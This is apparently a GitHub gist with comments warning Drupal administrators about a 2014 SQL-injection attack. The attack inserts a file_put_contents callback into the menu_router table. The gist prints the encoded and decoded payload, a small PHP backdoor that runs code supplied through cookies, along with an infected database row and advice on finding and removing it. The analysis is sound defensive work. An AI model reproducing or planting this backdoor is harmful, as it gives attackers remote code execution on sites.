Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Remote code execution attempt: will insert this binary data into the menu_router table: #drupalsa05

0x613a323a7b693a303b733a32333a226d6f64756c65732f7379736c6f672f727068622e706870223b693a313b733a3134373a223c3f7068702024666f726d313d40245f434f4f4b49455b224b63716633225d3b206966202824666f726d31297b20246f70743d24666f726d312840245f434f4f4b49455b224b63716632225d293b202461753d24666f726d312840245f434f4f4b49455b224b63716631225d293b20246f707428222f3239322f65222c2461752c323932293b207d20706870696e666f28293b223b7d

This attack will add file_put_contents() as the access_callback in your menu_router table.

Subsequently, that path is used attempt to drop more exploit code.

Look in menu router for file_put_contents and remove it if found.

Owner

joshkoenig commented Oct 16, 2014

Translates out to serialized PHP:

a:2:{i:0;s:23:"modules/syslog/rphb.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";}
Owner

joshkoenig commented Oct 16, 2014

Seems like it is designed to drop a menu_router callback, and then hit it at a later date with an exploit payload in the cookie.

This was a great heads up. I found a slight variant in one of my databases

+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+
| path | load_functions | to_arg_functions | access_callback | access_arguments | page_callback | page_arguments | delivery_callback | fit | number_parts | context | tab_parent | tab_root | title | title_callback | title_arguments | theme_callback | theme_arguments | type | description | position | weight | include_file |
+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+
| cuyyct | | | file_put_contents | a:2:{i:0;s:24:"modules/trigger/eygo.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";} | | NULL | | 0 | 0 | 0 | | | | | | | | 0 | cuyyct | | 0 | NULL |
+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+

Owner

joshkoenig commented Oct 16, 2014

Looks like this is trying to drop different files depending on how it's constructed. You should see if there's a modules/trigger/eygo.php file in your codebase.

Owner

joshkoenig commented Oct 16, 2014

Also, update your site! :)

There was a file in the codebase. I found the file when I tried to git pull my Drupal update and git complained of this file. Sites updated. Scary one though!

tamerzg commented Oct 18, 2014

It seems that the file has random name and randomly gets inserted in one of the modules subdirectory, as i seen in in different directories on couple of my sites.
More info on how to find it and delete it: http://www.zoubi.me/blog/drupageddon-updating-drupal-732-not-enough-your-site-may-already-be-hacked

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment